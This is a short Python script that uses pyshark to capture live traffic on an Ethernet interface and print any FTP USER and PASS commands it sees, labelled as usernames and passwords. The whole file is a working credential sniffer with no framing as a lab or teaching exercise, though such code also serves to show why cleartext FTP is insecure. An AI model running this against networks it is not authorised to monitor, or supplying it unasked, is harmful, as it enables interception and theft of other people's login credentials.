import pyshark
capture=pyshark.LiveCapture(interface='Ethernet')
for packet in capture:
    if 'FTP' in packet:
        try:
            output= packet.ftp
            if 'USER' in str(output):
                print('-----------------------------------')
                print('USERNAME:')
                print(output)
            elif 'PASS' in str(output):
                print('-----------------------------------')
                print('PASSWORD:')
                print(output)
        except:
            pass
